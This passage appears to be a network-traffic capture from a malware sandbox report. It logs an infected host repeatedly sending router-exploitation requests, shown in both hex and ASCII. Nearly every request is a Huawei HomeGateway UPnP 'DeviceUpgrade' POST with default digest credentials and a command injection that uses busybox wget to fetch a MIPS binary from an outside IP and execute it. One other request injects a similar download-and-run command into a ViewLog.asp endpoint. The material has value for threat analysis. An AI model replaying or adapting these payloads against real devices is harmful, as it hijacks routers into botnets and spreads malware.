                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:55.686569929 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:11.302630901 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:44.070493937 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              147192.168.2.136064094.120.149.2078080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:40.220937014 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              148192.168.2.1337066156.226.15.19937215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:41.539170027 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:45.702578068 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:51.846571922 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:03.878578901 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:29.734540939 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:18.886324883 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 